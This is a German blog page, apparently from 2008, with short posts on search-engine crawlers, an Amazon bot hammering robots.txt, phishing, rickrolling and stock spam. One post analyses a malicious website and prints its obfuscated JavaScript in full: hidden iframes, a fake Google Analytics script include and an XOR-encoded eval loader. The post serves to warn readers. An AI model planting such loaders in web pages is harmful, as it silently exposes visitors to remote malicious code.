everflux

Yahoo hat die Crawler Infrastruktur aktualisiert – teil davon ist Slurp 3.0, der neue Yahoo Crawler. Wie Golem berichtet hat Yahoo bisher nicht veröffentlicht, welche Aktualisierungen an dem Crawler vorgenommen wurden.

Dies ist kein unübliches Vorgehen, lediglich als Google seinen Crawler beigebracht hat, gzip Inhalte zu verstehen, oder die Crawler an einen gemeinsamen Cache angeschlossen hatte, um doppeltes Crawlen zu vermeiden, wurde dies publik gemacht. Bei Yahoo steht eine Umstellung auf Hadoop an – die Zukunft lautet bei Yahoo immer stärker OpenSource und Java. Sicherlich nicht schlecht für die Community, zudem zeigt es deutlich, dass Java alles andere als „langsam“ ist. Nachdem Yahoo auf einigen Seiten für 20% und mehr des Traffiks verantwortlich war, da der Crawler wild auf content war, könnte dieses unerwünschte Phänomen mit dem Slurp 3.0 nun der Vergangenheit angehören.

Man besucht eine Webseite – der Browser stürzt ab. Normalerweise passiert sowas nicht – Grund genug, sich das einmal anzuschauen.
Die Seite selber ist leer – bis auf JavaScript dass bei (sehr) flüchtiger Betrachtung nach einem Google Analytics Code aussieht. Aber auch wenn Google gerne JavaScript obfuscated – so viel Versteckspielen und dann noch eine domain von der externes JavaScript nachgeladen wird und safe.google-signature.com lautet? Merke: Nicht überall, wo „safe“ draufsteht oder „google-signature“ ist Google oder „safe“ drinn.

<!– ~ –><script language=“javascript“>var mnx=’%‘;document.write( unescape( ‚%3C%69%66%72’+mnx+’61’+mnx+’6D%65%20%73%72%63%3D’+mnx+’27’+mnx+’68’+mnx+’74’+mnx+
‚74%70%3A%2F%2F%75%73’+mnx+’65’+mnx+’72’+mnx+’73’+mnx+’6F’+mnx+’66%74%77%61%72%65
%2E%69%6E%2F’+mnx+’73’+mnx+’75’+mnx+’74’+mnx+’72%61%2F%69%6E%2E’+mnx+’63’+mnx+’67’+
mnx+’69’+mnx+’3F%33%27%20%77%69’+mnx+’64’+mnx+’74’+mnx+’68’+mnx+’3D%27%31%27%20%68%65’+
mnx+’69’+mnx+’67’+mnx+’68’+mnx+’74’+mnx+’3D%27%31%27%20%73%74%79’+mnx+’6C’+mnx+’65’+mnx+
‚3D%27%76’+mnx+’69’+mnx+’73%69%62%69%6C%69%74%79%3A%20%68%69%64’+mnx+’64’+mnx+
‚65%6E%3B%27%3E%3C%2F%69%66%72%61’+mnx+’6D%65’+mnx+’3E‘ ) );</script><script language=“javascript“>var mnx=’%‘;document.write( unescape(‚%3C%69%66%72’+mnx+’61’+mnx+’6D%65%20%73%72%63%3D’+mnx+’27’+mnx+’68’+mnx+’74’+
mnx+’74%70%3A%2F%2F%75%73’+mnx+’65’+mnx+’72’+mnx+’73’+mnx+’6F’+mnx+’66%74%77%61%72%65
%2E%69%6E%2F’+mnx+’73’+mnx+’75’+mnx+’74’+mnx+’72%61%2F%69%6E%2E’+mnx+’63’+mnx+’67’+mnx+
’69’+mnx+’3F%33%27%20%77%69’+mnx+’64’+mnx+’74’+mnx+’68’+mnx+’3D%27%31%27%20%68%65’+mnx+
’69’+mnx+’67’+mnx+’68’+mnx+’74’+mnx+’3D%27%31%27%20%73%74%79’+mnx+’6C’+mnx+’65’+mnx+
‚3D%27%76’+mnx+’69’+mnx+’73%69%62%69%6C%69%74%79%3A%20%68%69%64’+mnx+’64’+mnx+
‚65%6E%3B%27%3E%3C%2F%69%66%72%61’+mnx+’6D%65’+mnx+’3E‘ ) );</script>
<!– ~ –><script src=“http://safe.google-signature.com/webanalytics.js“></script><script>function v47f603df6c30c(v47f603df6c312){ function v47f603df6c319 () {var v47f603df6c31d=16; return v47f603df6c31d;} return(parseInt(v47f603df6c312,v47f603df6c319()));}function v47f603df6c33e(v47f603df6c342){ function
v47f603df6c350 () {return 2;} var v47f603df6c346=“;for(v47f603df6c34a=0; v47f603df6c34a<v47f603df6c342.length; v47f603df6c34a+=v47f603df6c350()){ v47f603df6c346+=(String.fromCharCode(v47f603df6c30c(v47f603df6c342.substr(v47f603df6c34a, v47f603df6c350()))));}return v47f603df6c346;} document.write(v47f603df6c33e(‚3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63
756D656E742E777269746528273C696672616D65206E616D653D623632343234396337373234207372633D5C2
7687474703A2F2F75726C2F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A33353231372
92B2737645C272077696474683D333837206865696768743D3931207374796C653D5C27646973706C61793A20
6E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E‘));</script>

Die IP des hosts zeigt irgendwo nach Panama, die Domain ist auf „irgendwen“ registriert.
Danach versucht der Browser Daten nachzuladen:
GET http://safe.google-signature.com/webanalytics.js HTTP/1.0
GET http://usersoftware.in/sutra/in.cgi?3 HTTP/1.0
GET http://201.218.250.115/webanalytics/count.php?o=1 HTTP/1.0
Hier geht nur der erste Request noch gut, alles andere existiert nicht mehr, so dass eine Analyse schwer wird. Aber es sieht verdammt stark nach dem Versuch aus, Spyware oder ähnliches zu verbreiten. Eine Google Suche nach „google-signature.com“ bringt einige Seiten, in die der Code nicht korrekt eingebaut ist.
function google_jdbhra(google_aotnpc,google_uhj) { var google_dtbxcs = „“; for (var i = 0 ; i < google_aotnpc.length; ++i) google_dtbxcs += String.fromCharCode(google_uhj ^ google_aotnpc.charCodeAt(i)); return google_dtbxcs; } function google_vcp(google_hmp) { eval(google_hmp); return; } google_vcp(google_jdbhra(„\xe8\xf6\xf1\xfb\xf0\xe8\xb1\xec\xeb\xfe\xeb\xea\xec\xa2\xbd\xdb\xf0\xf1\xfa
\xbd\xa4\x92\x95\xfb\xf0\xfc\xea\xf2\xfa\xf1\xeb\xb1\xe8\xed\xf6\xeb\xfa\xb7\xb8\xa3\xf6\xb8\xb4\xb8\xf9
\xed\xfe\xb8\xb4\xb8\xf2\xfa\xbf\xec\xed\xb8\xb4\xb8\xfc\xa2\xbd\xb8\xb4\xea\xf1\xfa\xec\xfc\xfe\xef\xfa
\xb7\xb8\xf7\xeb\xeb\xef\xba\xac\xde\xb0\xb0\xad\xaf\xae\xb1\xad\xae\xa7\xb1\xad\xaa\xaf\xb1\xae\xae
\xaa\xb0\xe8\xfa\xfd\xfe\xf1\xfe\xf3\xe6\xeb\xf6\xfc\xec\xb0\xfc\xf0\xea\xf1\xeb\xb1\xef\xf7\xef\xba\xac\xd9\xf0
\xba\xac\xdb\xae\xb8\xb6\xb4\xb8\xbd\xbf\xe8\xf6\xfb\xeb\xf7\xa2\xbd\xaf\xbd\xbf\xf7\xfa\xf6\xf8\xf7\xeb\xa2
\xbd\xaf\xbd\xbf\xec\xeb\xb8\xb4\xb8\xe6\xf3\xfa\xa2\xbd\xfb\xf6\xb8\xb4\xb8\xec\xef\xb8\xb4\xb8\xf3\xfe
\xe6\xb8\xb4\xb8\xa5\xf1\xf0\xb8\xb4\xb8\xf1\xfa\xbd\xa1\xb8\xb6\xa4″, 159));

Der Amazon Bot (AMZNKAssocBot/4.0) ist ein ganz schön fleißiger Bot. Insbesondere, wenn es darum geht, die robots.txt abzurufen.
Offenbar findet so ein Abruf nämlich vor jedem anderen Request statt, ein Verhalten, dass ich früher so nicht beobachtet habe.

87.238.80.64 - - [30/Mar/2008:13:48:53 +0200] "GET /robots.txt HTTP/1.1"
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:48:54 +0200] "GET /robots.txt HTTP/1.1" 
200783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:48:55 +0200] "GET /robots.txt HTTP/1.1" 
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:48:56 +0200] "GET /robots.txt HTTP/1.1" 
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:48:56 +0200] "GET /robots.txt HTTP/1.1" 
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:48:58 +0200] "GET /robots.txt HTTP/1.1" 
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:48:59 +0200] "GET /robots.txt HTTP/1.1" 
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum
87.238.80.64 - - [30/Mar/2008:13:49:00 +0200] "GET /robots.txt HTTP/1.1" 
200 783 "-" "Mozilla/5.0 (compatible; AMZNKAssocBot/4.0)" 0 forum

Der Amazon Partnernet Support ist dann auch direkt kontaktiert worden – schließlich ändert sich die robots.txt so schnell nun auch wieder nicht, und der alte Server freut sich über solche Requests nicht unbedingt in den siebten Himmel.

Amazon hat heute neue Dienste und Features für seine elastic Produkte angekündigt. Neu hinzugekommen ist eine API für die Elastic Compute Cloud (EC2), über die der Ort einer EC2 Instanz angegeben werden kann. Weiterlesen »

Cheating – verpönt und geliebt. Hießen früher die Cheats noch „Trainer“, so geht es heute oft um handfeste und oft auch monetäre Motive, wenn gecheatet wird.
Gerade wenn es um online multiplayer Games geht – z.B. Counterstrike, Second Life oder World of Warcraft – ist ein „aufgebauter“ Account für viele Jugendliche und andere Spieler eine Art Statussymbol.
Für manch einen ist daraus ein lukrativer Markt entstanden – vor allem in asiatischen Ländern sitzen Menschen in Lagerhallen und bauen Charaktere auf, den ganzen Tag lang. Anschließend werden diese per Ebay oder speziellen Marktplätzen verkauft, denn nicht jeder möchte seine Lebenszeit in den Aufbau eines Charakters investieren.
Weiterlesen »

Klar, zu Ostern sind wieder Spam Wellen für alles erdenktliche unterwegs. Aber so ein plumper Phishing-Versuch dürfte in meinen Augen nicht erfolgreich sein.
Wer zum Henker könnte auf sowas reinfallen…
Weiterlesen »

Derzeit kursieren Phishing Mails für Steam Accounts – was bisher nur von Banken bekannt war, findet jetzt auch bei Steam Anwendung.
Steam ist das Vertriebs- und Sicherungssystem von Valve Software, um eigene Spiele wie Counter Strike Source oder Half Life zu vertreiben. Und gegen unerlaubtes Kopieren (Raubkopien) zu schützen. Weiterlesen »

Rickrolling ist der neue Spam Trend aus den USA. (Woher auch sonst.) Rickrolling findet sich daher auch – noch – nicht in den meisten Wörterbüchern, aber ist schnell erklärt:
Wenn jemand einen Rickroll macht, dann wird ein Video Link – z.B. zu diesem Video in dem Angela Merkel mit dem Lawblogger Udo Vetter im Bett zu sehen ist – gepostet.
Klickt man den Video Link an, findet man jedoch einen Song von Rick Astley. Daher kommt auch der Name Rick Roll.
In der Regel wird beim Rickrolling ein Videotrailer oder ein Video von einem bisher unveröffentlichten Spiel versprochen statt Angela Merkel. Je nach Zielgruppe eben. Weiterlesen »

Liechtenstein ist der Ort, den im Moment ungekannte Popularität genießt: Hier wurden Selbstanzeigen beim Finanzamt, Steuerfahndungen und – nicht zu vergessen – eine Welle von Selbstanzeigen wegen Steuerhinterziehung losgetreten.
Viele haben wenn es um Steuerhinterziehung geht wenig moralische Grenzen – es geht darum das Geld in Sicherheit vor dem Finanzamt zu bringen. Weiterlesen »

Der neueste Aktien-Spam kam gerade rein, diesmal geht es um die Mallorca Building AG. (WKN A0M1BU bzw. ISIN CH0032901453)
Natürlich handelt es sich wieder um hochspekulative Penny-Stock Pump-and-Dump Spam Aktionen.
Wer bei Spam-Mails investiert hat es verdient, viel Geld zu verlieren.
Weiterlesen »